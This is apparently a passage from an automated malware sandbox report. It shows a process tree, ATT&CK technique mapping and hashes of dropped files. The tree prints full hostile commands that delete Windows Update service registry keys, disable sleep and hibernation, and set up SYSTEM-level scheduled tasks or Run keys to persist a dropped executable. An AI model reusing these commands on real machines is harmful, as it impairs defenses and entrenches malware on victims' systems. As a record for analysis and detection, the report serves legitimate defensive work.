C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
PID:1924
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
PID:2900
-
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
PID:1848
-
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
PID:1736
-
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
PID:320
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵PID:1648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵PID:2116
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
PID:1652
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵PID:2092
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:1948
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"5⤵
- Scheduled Task/Job: Scheduled Task
PID:2096
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Drops file in Windows directory
PID:3028
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Barac5⤵PID:2364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe"C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:2832
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:1776
-
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2095018224-93949587-1799823534104982219012234691081636728403-408151524-977889501"1⤵PID:1664
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
3Windows Service
3Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Indicator Removal
1Clear Windows Event Logs
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.4MB
MD5b70a5e7260b025e39b8016523a1f2d64
SHA1aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7
SHA256fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490
SHA512a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca
-
Filesize
502KB
MD5ea001f076677c9b0dd774ae670efdf63
SHA137a4466f3c38b60a30fc1073b9d0b2d2d0e692e5
SHA25619fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100
SHA5126d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652
-
Filesize
2.7MB
MD5952f360a4651f948be3a673178631641
SHA160e58b89cfce587aa121baf431d55cbbecd21545
SHA256a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8
SHA512af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5964570c03b8a3e08e6333aa5f988bc43
SHA1e9a970f4b38773dcc8d0b55887f2d29eaeaa110a
SHA256606586d8d931f73e2974ad66598a97b8a55f671337882002bdb5305133d2815b
SHA512e3c759d400f65b1d68bf84849863dcfed02292fe7696f966a8517bde100c9d4ea0f0c3052ab0fd9bf50950c10f8485b572010b165e7d13c824935031ec477516
-
Filesize
1KB
MD56e2eccdf8bedade9008b740a6012d4ba
SHA1b7e227798610062eca7059b29ffc273600be0c4c
SHA256581f90d7d1a3938885c7559b5d39b4f1178c7a322c8f0192bd2b1d8e262ece35
SHA5128b24ac88f84e2417849e1a3d71930051b7f23d292ea4a0a8858fd2869297026d65046a4f5819d4f19dc3c50696c371bd69021e067d9dde47055098426b638827
-
Filesize
1KB
MD5ba1897d6166ed94ad21887aacca349b0
SHA1fbd9a39fff565c7e79eb840d2779fb47fc09cc5e
SHA2567b6e9b56d0d672db1f035bfe87780ebe691b7ba1525a1bd1b85488559aa9a29e
SHA512d33af88ce704b21c3ca983121601647ef5568d956449b35006952a80609cacc61adcec0785e85d61dc25392f7c798189817911989003da72d5d80653f5f3ca27
-
Filesize
2.4MB
MD58e40252356a6fb3f8f52d1effa2c2c3c
SHA13bf5461b591a53dcb48ea2dc6535cd90aa786c4e
SHA256de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a
SHA512c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a